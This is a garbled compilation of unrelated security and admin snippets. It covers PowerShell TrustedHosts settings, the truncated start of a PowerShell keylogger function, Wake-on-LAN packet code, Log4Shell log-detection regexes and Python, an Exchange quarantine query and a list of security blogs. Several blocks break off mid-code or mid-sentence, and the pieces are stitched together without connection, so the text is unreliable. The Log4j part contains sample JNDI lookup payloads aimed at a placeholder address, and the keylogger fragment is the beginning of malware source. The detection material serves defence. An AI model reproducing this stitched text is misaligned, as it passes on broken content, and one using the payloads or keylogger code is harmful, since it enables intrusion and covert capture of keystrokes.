Slides and code examples from my "Python's Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
#requires -version 2
<#
.SYNOPSIS
<Overview of script>
.DESCRIPTION
<Brief description of script>
.PARAMETER <Parameter_Name>
<Brief description of parameter input required. Repeat this attribute if required>
## Hey folks, this is just a quick walkthrough on modifying the TrustedHosts property in WSMan using PowerShell
# PowerShell exposes the WinRM client and service configuration as the WSMan: PSDrive (Microsoft.WSMan.Management module)
# The TrustedHosts property is changed with the Set-Item cmdlet; this needs an elevated (administrator) session
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.1.13
# This sets the value to 192.168.1.13; it also overwrites any existing entries (use the -Concatenate switch to append instead)
# To cover a whole subnet you can use the wildcard character
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.1.*
# Caveat: TrustedHosts only matters for connections that cannot use Kerberos (IP addresses, workgroup hosts) and fall back to NTLM or Basic.
# Hosts listed here are not authenticated by the client before credentials are sent, so a spoofed endpoint can harvest or relay them.
# Avoid "*" and keep the list as narrow as the task allows; read the current value back with Get-Item before changing it.
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
from scapy.all import IP, UDP, Raw, send
import sys

# Wake-on-LAN magic packet: a sync stream of six 0xff bytes followed by the target MAC repeated 16 times,
# broadcast to UDP port 9 (discard). Usage: sudo python3 wol.py aa:bb:cc:dd:ee:ff
# (scapy's send() writes to a raw socket, so it needs root / CAP_NET_RAW)
mac = bytes.fromhex(sys.argv[1].replace(':', ''))
if len(mac) != 6:
    sys.exit("expected a MAC address like aa:bb:cc:dd:ee:ff")
send(IP(dst="255.255.255.255") / UDP(dport=9) / Raw(load=b'\xff' * 6 + mac * 16))
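The script above builds the magic packet by hand and hands it to scapy. What follows is an added example, not code from the presentation, that does the same without scapy and adds the receiving side: a builder that validates the MAC address format, a parser that decides whether an arbitrary UDP payload is a well-formed magic packet (what a network sensor needs, since the sync stream may sit anywhere in the payload), and a sender that uses an ordinary broadcast UDP socket, so no raw-socket privileges are required. The optional 6-byte SecureOn password that some NICs accept is handled as a trailer; all function and constant names are this example's own, not anything from the page.

```python
import re
import socket
from typing import List, Optional, Tuple

# Added example, not the presentation's code. Magic-packet layout as used by the script above:
# 6 bytes of 0xff (sync stream) followed by the target MAC repeated 16 times, 102 bytes in total.
SYNC = b"\xff" * 6
# aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabbccddeeff; the backreference rejects mixed separators
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([-:]?)(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")


def parse_mac(mac: str) -> bytes:
    """Return the 6 raw bytes of a MAC address given in any of the accepted textual forms."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes.fromhex(re.sub(r"[-:]", "", mac))


def build_magic_packet(mac: str, secureon: Optional[bytes] = None) -> bytes:
    """Magic packet for `mac`; `secureon` is the optional 6-byte SecureOn password (sent in cleartext)."""
    payload = SYNC + parse_mac(mac) * 16
    if secureon is not None:
        if len(secureon) != 6:
            raise ValueError("SecureOn password must be exactly 6 bytes")
        payload += secureon
    return payload


def parse_magic_packet(payload: bytes) -> Optional[Tuple[str, Optional[bytes]]]:
    """Locate the sync stream anywhere in `payload` and check that exactly 16 copies of one MAC follow it.

    Returns (mac_string, secureon_password_or_None), or None if the payload is not a magic packet.
    """
    start = payload.find(SYNC)
    if start < 0:
        return None
    body = payload[start + len(SYNC):]
    mac = body[:6]
    if body[:96] != mac * 16:          # fails for short bodies and for mismatched repetitions
        return None
    trailer = body[96:]
    if len(trailer) not in (0, 6):     # nothing, or a 6-byte SecureOn password
        return None
    mac_str = ":".join(f"{b:02x}" for b in mac)
    return mac_str, (trailer if trailer else None)


def send_magic_packet(payload: bytes, broadcast: str = "255.255.255.255", port: int = 9) -> int:
    """Broadcast the packet over a plain UDP socket; returns the number of bytes sent. No root needed."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        return s.sendto(payload, (broadcast, port))


if __name__ == "__main__":
    import sys
    send_magic_packet(build_magic_packet(sys.argv[1]))
```

Magic packets carry no authentication: anyone on the broadcast domain who observes one, SecureOn trailer included, can replay it, which is why the parser is the useful half for a defender (flag WoL to hosts that should never be woken remotely) and why SecureOn should not be mistaken for access control.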
The PowerShell updatable help system is a useful, if under-utilised, way to supply up-to-date help documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is
You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228 (Log4Shell).
This command searches for exploitation attempts in uncompressed files in the folder /var/log
and all of its sub-folders (-r recurses, -I skips binary files, -i makes the match case-insensitive):
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
Note that this pattern only matches the plain form of the lookup. Probes that URL-encode the colon (jndi%3A) or nest lookups to split the keyword, such as ${${lower:j}ndi:...} or ${::-j}${::-n}di:..., are not caught by it, and rotated, compressed logs (*.gz) need a separate pass with zgrep.
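Added example, not part of the original note: the same detection run in Python over constructed sample access-log lines (not real traffic). plain_grep applies the page's egrep pattern unchanged, so it shows which of the sample probes the one-liner finds; find_jndi_probes first normalises each line (URL-decoding, then collapsing ${lower:x}/${upper:x} and ${...:-x} default-value lookups, repeated until the text stops changing) and only then matches, which is what catches the obfuscated forms. Function names and the sample addresses are this example's own.

```python
import re
import urllib.parse
from typing import List, Tuple

# Constructed sample log lines (not real traffic). Lines 1-4 carry a JNDI probe in plain,
# URL-encoded, ${lower:}/${upper:} and ${::-x} default-value obfuscated form; line 5 is benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7/x}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/y}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# The page's egrep pattern, unchanged apart from being a Python regex (egrep -i => IGNORECASE).
PLAIN_RE = re.compile(r"\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+", re.IGNORECASE)
# Pattern applied to a normalised line.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):", re.IGNORECASE)
# ${lower:x} / ${upper:x} wrapping a literal fragment -> x (the later match is case-insensitive anyway)
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} default-value lookups, including the bare ${::-x} form -> x
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def plain_grep(lines: List[str]) -> List[int]:
    """1-based numbers of the lines the page's unnormalised pattern flags."""
    return [n for n, line in enumerate(lines, 1) if PLAIN_RE.search(line)]


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and the common nested-lookup obfuscations, innermost first, until stable."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = CASE_RE.sub(r"\1", text)
        text = DEFAULT_RE.sub(r"\1", text)
        if text == before:
            break
    return text


def find_jndi_probes(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, lookup scheme, normalised lookup string) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI_RE.search(norm)
        if m:
            end = norm.find("}", m.end())
            snippet = norm[m.start(): end + 1] if end >= 0 else norm[m.start():]
            hits.append((n, m.group(1).lower(), snippet))
    return hits


if __name__ == "__main__":
    print("plain pattern flags lines:", plain_grep(SAMPLE_LOG_LINES))
    for hit in find_jndi_probes(SAMPLE_LOG_LINES):
        print(hit)
```

On the sample lines the plain pattern flags only line 1, while the normalised search flags lines 1 to 4. The normaliser is deliberately narrow (it only folds lower/upper and default-value lookups, the constructs seen in the wild most often); a line that still contains an unexpanded ${...} lookup after normalisation is itself worth reviewing, since legitimate clients do not send Log4j lookup syntax.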
# Must be connected to Exchange Online (Connect-ExchangeOnline from the ExchangeOnlineManagement module)
# Gets all quarantined messages from the last week
# Results are grouped by recipient; Sort-Object runs first so that Format-Table -GroupBy yields one group per recipient rather than a new group every time the address changes
# Caveat: Get-MessageTrace only covers the last 10 days and returns a single page of results (1000 by default, -PageSize up to 5000); in a large tenant page through with -Page
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).AddDays(-7) -Status Quarantined |
Sort-Object -Property RecipientAddress |
Format-Table -GroupBy RecipientAddress
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/